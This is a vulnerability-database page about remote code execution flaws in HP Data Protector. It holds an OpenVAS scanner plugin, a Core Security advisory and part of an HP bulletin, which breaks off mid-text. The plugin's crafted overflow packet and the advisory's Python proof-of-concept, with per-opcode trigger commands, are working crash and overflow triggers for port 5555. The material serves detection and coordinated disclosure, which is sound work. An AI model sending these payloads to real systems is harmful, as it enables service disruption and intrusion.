HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities
2011-07-01T00:00:00
ID OPENVAS:1361412562310902454 Type openvas Reporter Copyright (c) 2011 SecPod Modified 2018-09-17T00:00:00
Description
This host is installed with HP (OpenView Storage) Data Protector and is prone to
multiple remote code execution vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_hp_data_protector_mult_code_exec_vuln.nasl 11421 2018-09-17 06:58:23Z cfischer $
#
# HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities
#
# Authors:
# Antu Sanadi <santu@secpod.com>
#
# Copyright:
# Copyright (c) 2011 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:hp:data_protector";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.902454");
script_version("$Revision: 11421 $");
script_tag(name:"last_modification", value:"$Date: 2018-09-17 08:58:23 +0200 (Mon, 17 Sep 2018) $");
script_tag(name:"creation_date", value:"2011-07-01 16:09:45 +0200 (Fri, 01 Jul 2011)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2011-1865", "CVE-2011-1514", "CVE-2011-1515", "CVE-2011-1866");
script_bugtraq_id(48486);
script_name("HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities");
script_category(ACT_DENIAL);
script_copyright("Copyright (c) 2011 SecPod");
script_family("General");
script_dependencies("hp_data_protector_installed.nasl");
script_require_ports("Services/hp_dataprotector", 5555);
script_mandatory_keys("hp_data_protector/installed");
script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/17458/");
script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2011/Jun/552");
script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2011/Jun/551");
script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to execute
arbitrary code and lead to denial of service conditions.");
script_tag(name:"affected", value:"HP (OpenView Storage) Data Protector 6.20 and prior.");
script_tag(name:"insight", value:"Multiple flaws are due to error in 'data protector inet' service,
command. which allows remote remote attackers to execute arbitrary code.");
script_tag(name:"summary", value:"This host is installed with HP (OpenView Storage) Data Protector and is prone to
multiple remote code execution vulnerabilities.");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");
script_tag(name:"solution_type", value:"WillNotFix");
script_tag(name:"qod_type", value:"remote_vul");
exit(0);
}
include("host_details.inc");
if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
get_app_location( cpe:CPE, port:port, nofork:TRUE ); # To have a reference to the Detection NVT within the GSA
soc = open_sock_tcp( port );
if( ! soc ) exit( 0 );
headdata = raw_string( 0x00, 0x00, 0x27, 0xca, 0xff, 0xfe, 0x32,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x00,
0x00, 0x20, 0x00 );
middata = crap( data:raw_string( 0x61 ), length:10001 );
lastdata = raw_string( 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,
0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,
0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,
0x00, 0x61, 0x00, 0x00, 0x00 );
req = headdata + middata + lastdata;
send( socket:soc, data:req );
close( soc );
sleep( 5 );
soc = open_sock_tcp( port );
if( ! soc ) {
security_message( port:port );
exit( 0 );
} else {
response = recv( socket:soc, length:4096, timeout:20 );
if( "HP Data Protector" >!< response && "HPE Data Protector" >!< response && "HP OpenView Storage Data Protector" >!< response ) {
security_message( port:port );
exit( 0 );
}
}
close( soc );
exit( 99 );
{"id": "OPENVAS:1361412562310902454", "type": "openvas", "bulletinFamily": "scanner", "title": "HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities", "description": "This host is installed with HP (OpenView Storage) Data Protector and is prone to\n multiple remote code execution vulnerabilities.", "published": "2011-07-01T00:00:00", "modified": "2018-09-17T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902454", "reporter": "Copyright (c) 2011 SecPod", "references": ["http://seclists.org/fulldisclosure/2011/Jun/551", "http://www.exploit-db.com/exploits/17458/", "http://seclists.org/fulldisclosure/2011/Jun/552"], "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865", "CVE-2011-1866"], "lastseen": "2019-05-29T18:39:36", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-1865", "CVE-2011-1514", "CVE-2011-1515", "CVE-2011-1866"]}, {"type": "nessus", "idList": ["HP_DATA_PROTECTOR_0620_MULTIPLE_VULNS_CREDS.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26622", "SECURITYVULNS:VULN:11768", "SECURITYVULNS:DOC:26620", "SECURITYVULNS:DOC:26621"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102732", "PACKETSTORM:102673", "PACKETSTORM:102746", "PACKETSTORM:102677"]}, {"type": "seebug", "idList": ["SSV:71826", "SSV:71823"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:00DB1608EA05836AAFE73947E6790FBA", "EXPLOITPACK:357E2A5253FECAF999A26172A2781370"]}, {"type": "saint", "idList": ["SAINT:58795E132074156A75A962B77A5E7B84", "SAINT:C5838FC8C5DFFAC4C8B6A54D44AF1F95", "SAINT:1A7CE71BAD720EA2DC8BE64DC4A90616", "SAINT:BE1843E272D1C58DB8EE87EEE629BCF9", "SAINT:BFECBBFEF0FF935EC2948195CF6FCA20", "SAINT:06C6A95370F0B8116A7243D809437C0C"]}, {"type": "exploitdb", "idList": ["EDB-ID:17468", "EDB-ID:17458", "EDB-ID:17461", "EDB-ID:17490", "EDB-ID:17467"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_4", "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_3"]}], "modified": "2019-05-29T18:39:36", "rev": 2}, "score": {"value": 10.0, "vector": "NONE", "modified": "2019-05-29T18:39:36", "rev": 2}, "vulnersScore": 10.0}, "pluginID": "1361412562310902454", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_hp_data_protector_mult_code_exec_vuln.nasl 11421 2018-09-17 06:58:23Z cfischer $\n#\n# HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:hp:data_protector\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902454\");\n script_version(\"$Revision: 11421 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-17 08:58:23 +0200 (Mon, 17 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-01 16:09:45 +0200 (Fri, 01 Jul 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-1865\", \"CVE-2011-1514\", \"CVE-2011-1515\", \"CVE-2011-1866\");\n script_bugtraq_id(48486);\n script_name(\"HP (OpenView Storage) Data Protector Multiple Remote Code Execution Vulnerabilities\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"hp_data_protector_installed.nasl\");\n script_require_ports(\"Services/hp_dataprotector\", 5555);\n script_mandatory_keys(\"hp_data_protector/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/17458/\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Jun/552\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Jun/551\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code and lead to denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"HP (OpenView Storage) Data Protector 6.20 and prior.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to error in 'data protector inet' service,\n command. which allows remote remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with HP (OpenView Storage) Data Protector and is prone to\n multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nget_app_location( cpe:CPE, port:port, nofork:TRUE ); # To have a reference to the Detection NVT within the GSA\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\n\nheaddata = raw_string( 0x00, 0x00, 0x27, 0xca, 0xff, 0xfe, 0x32,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x32, 0x00, 0x38, 0x00, 0x00,\n 0x00, 0x20, 0x00 );\n\nmiddata = crap( data:raw_string( 0x61 ), length:10001 );\n\nlastdata = raw_string( 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00, 0x20, 0x00, 0x61,\n 0x00, 0x00, 0x00, 0x20, 0x00, 0x61, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x61, 0x00, 0x00, 0x00, 0x20,\n 0x00, 0x61, 0x00, 0x00, 0x00 );\n\nreq = headdata + middata + lastdata;\n\nsend( socket:soc, data:req );\n\nclose( soc );\n\nsleep( 5 );\n\nsoc = open_sock_tcp( port );\nif( ! soc ) {\n security_message( port:port );\n exit( 0 );\n} else {\n response = recv( socket:soc, length:4096, timeout:20 );\n if( \"HP Data Protector\" >!< response && \"HPE Data Protector\" >!< response && \"HP OpenView Storage Data Protector\" >!< response ) {\n security_message( port:port );\n exit( 0 );\n }\n}\n\nclose( soc );\n\nexit( 99 );", "naslFamily": "General"}
{"securityvulns": [{"lastseen": "2018-08-31T11:09:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865", "CVE-2011-1866"], "description": "Multiple vulnerabilities in TCP/5555 service.", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:VULN:11768", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11768", "title": "HP OpenView Storage Data Protector multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n Multiple vulnerabilities in HP Data Protector\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Multiple vulnerabilities in HP Data Protector\r\nAdvisory ID: CORE-2011-0514\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120], Null pointer dereference\r\n[CWE-476], Improper input validation [CWE-20]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. Multiple vulnerabilities have\r\nbeen found in HP Data Protector that could allow a remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered by sending a request to port 5555 of a\r\nhost running the "data protector inet" service, part of HP Data\r\nProtector. The request has several parameters, including an opcode. By\r\nsending requests with specially crafted parameters, the different bugs\r\ncan be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to these issues.\r\nHP has provided the following procedure to mitigate these vulnerabilities:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered by Oren Isacson from Core Security\r\nTechnologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe following python script can be used to reproduce the different bugs.\r\n\r\n/-----\r\nimport struct, socket, sys\r\n\r\ntarget = sys.argv[1]\r\nopcode = sys.argv[2]\r\nstring_lenght = int(sys.argv[3])\r\nargs_number = int(sys.argv[4])\r\nlong_argument = int(sys.argv[5])\r\n\r\ndef to_wc(x):\r\n return ''.join(["%s\x00" % c for c in x] )\r\n\r\nargs = [to_wc('a')] * args_number\r\nargs[5] = to_wc(opcode)\r\nargs[long_argument] = 'a' * string_lenght\r\npacket = ["\xff\xfe\x32\x00\x00\x00"]\r\n\r\nfor s in args:\r\n packet.append("\x20\x00" + s + "\x00\x00")\r\n\r\npacket = ''.join(packet)\r\npacket = struct.pack(">L", len(packet)) + packet\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\n\r\n- -----/\r\n\r\n\r\nIn the following sections, we give the command line details to reproduce\r\neach bug, and a brief description of the effect produced.\r\n\r\n\r\n8.1. *Vulnerability 1. Opcodes 20 y 28.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 20 10000 30 13" or "poc.py 127.0.0.1 28 10000 30 6"\r\n This causes a stack overflow.\r\n\r\n/-----\r\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\r\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\r\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\r\n61616161 00000000 00000000 00000000 00000000 0x61616161\r\n\r\n- -----/\r\n\r\n\r\n\r\n8.2. *Vulnerability 2. Opcode 11.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 10000 30 17"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0x00411A72.\r\n\r\n\r\n8.3. *Vulnerability 3. Opcode 35.*\r\n\r\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\r\nfollowing commands:\r\n "poc.py 127.0.0.1 35 10000 30 6" or "poc.py 127.0.0.1 35 10000 30 7"\r\n A stack overflow is produced within the function swprintf, called from\r\nposition 0041367F.\r\n\r\n\r\n8.4. *Vulnerability 4. Opcode 42.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 42 10000 30 9"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A9BA.\r\n\r\n\r\n8.5. *Vulnerability 5. Opcode 46.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 46 10000 30 17"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040A708.\r\n\r\n\r\n8.6. *Vulnerability 6. Opcode 27.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 27 10000 30 3"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040AD53.\r\n\r\n\r\n8.7. *Vulnerabilidad 7. Opcode 17.*\r\n\r\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 17 10000 30 6"\r\n A stack overflow is produced by calling the function swprintf from\r\nposition 0x0040FC05.\r\n\r\n\r\n8.8. *Vulnerability 8. Opcode 11.*\r\n\r\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 11 1 7 6"\r\n This causes a null pointer dereference.\r\n\r\n/-----\r\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\r\nedi=00000000\r\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010212\r\nomniinet+0x7ed0:\r\n00407ed0 8b10 mov edx,[eax]\r\nds:0023:00000014=????????\r\n\r\n\r\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\r\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\r\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\r\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\r\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\r\n007cffb4 7c80b713 00156490 00000000 0012e7f8\r\nADVAPI32!CryptVerifySignatureW+0x29\r\n007cffec 00000000 77df3519 00156490 00000000\r\nkernel32!GetModuleFileNameA+0x1b4\r\n\r\n- -----/\r\n\r\n\r\n8.9. *Vulnerability 9. Opcode 20.*\r\n\r\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\r\n "poc.py 127.0.0.1 20 1 7 6"\r\n The process terminates without generating an exception, resulting in a\r\ndenial of service condition.\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n 2011-06-02:\r\nCore Security Technologies notifies HP Security Alert team of the\r\nvulnerabilities. Publication date is temporarily set to July 5th, 2011.\r\n\r\n 2011-06-06:\r\nVendor acknowledges receipt.\r\n\r\n 2011-06-06:\r\nCore sends technical details to the vendor.\r\n\r\n 2011-06-06:\r\nVendor confirms that a new case was assigned within HP Software Security\r\nResponse Team (SSRT).\r\n\r\n 2011-06-16:\r\nCore requests an update on this issue, in particular Core asks the\r\nvendor for a technical analysis of the bugs, a list of affected products\r\nand versions, and the vendor's plan for providing a fix (no reply\r\nreceived).\r\n\r\n 2011-06-23:\r\nCore requests once more an update.\r\n\r\n 2011-06-28:\r\nVendor communicates that a security bulletin will be issued on the same\r\nday (June 28). The vendor confirms the vulnerabilities, and recommends\r\nas mitigation to enable encrypted communications in the cell server and\r\nclient.\r\n\r\n 2011-06-28:\r\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\r\nhave been assigned.\r\n\r\n 2011-06-28:\r\nVendor provides a link to the bulletin and CVE names for the\r\nvulnerabilities.\r\n\r\n 2011-06-29:\r\nAdvisory CORE-2011-0514 is published.\r\n\r\n\r\n10. *References*\r\n\r\n[1] HP Data Protector http://hp.com/go/dataprotector\r\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\r\nRemote Execution of Arbitrary Code\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2011 Core Security\r\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\n\r\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\r\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\r\n=ozGY\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-07-06T00:00:00", "published": "2011-07-06T00:00:00", "id": "SECURITYVULNS:DOC:26621", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26621", "title": "CORE-2011-0514: Multiple vulnerabilities in HP Data Protector", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-1865", "CVE-2011-1866"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02872182\r\nVersion: 3\r\n\r\nHPSBMU02686 SSRT100541 rev.3 - HP OpenView Storage Data Protector, Remote Execution of\r\nArbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2011-06-28\r\nLast Updated: 2011-06-29\r\n\r\n -------------------------------------------------------------------------------\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities has been identified with HP OpenView Storage Data\r\nProtector. These vulnerabilities could be remotely exploited to execute arbitrary code.\r\n\r\nReferences: CVE-2011-1865, CORE-2011-0514; CVE-2011-1866, CORE-2011-0606\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Storage Data Protector v6.20 running on Windows.\r\nHP OpenView Storage Data Protector v6.11 running on Windows.\r\nHP OpenView Storage Data Protector v6.10 running on Windows.\r\nHP OpenView Storage Data Protector v6.00 running on Windows.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2011-1865 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2011-1866 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Nahuel C. Riva and Oren Isacson at CORE-SECURITY.com for\r\nreporting these vulnerabilities to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has provided the following procedure to resolve these vulnerabilities.\r\n1. Upgrade to Data Protector A.06.20 or subsequent\r\n2. Enable encrypted control communication services on cell server and all clients in cell\r\n\r\nThe upgrade is available for download from http://hp.com/go/dataprotector then under 'Product\r\nInformation' click on 'Trials and Demos'.\r\n\r\nHISTORY\r\nVersion: 1 (rev.1) - 28 June 2011 Initial release\r\nVersion: 2 (rev.2) - 28 June 2011 Updated attribution\r\nVersion: 3 (rev.3) - 29 June 2011 Corrected CVSS data\r\n\r\nhird Party Security Patches: Third party security patches that are to be installed on systems\r\nrunning HP software products should be applied in accordance with the customer's patch\r\nmanagement policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email\r\nto: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be\r\nencrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email:\r\nhttps://h41183.www4.hp.com/signup_alerts.php?lang=en&cc=US&prodSeriesId=&jumpid=hpsc_secbulletins\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\n 3C = 3COM\r\n 3P = 3rd Party Software\r\n GN = HP General Software\r\n HF = HP 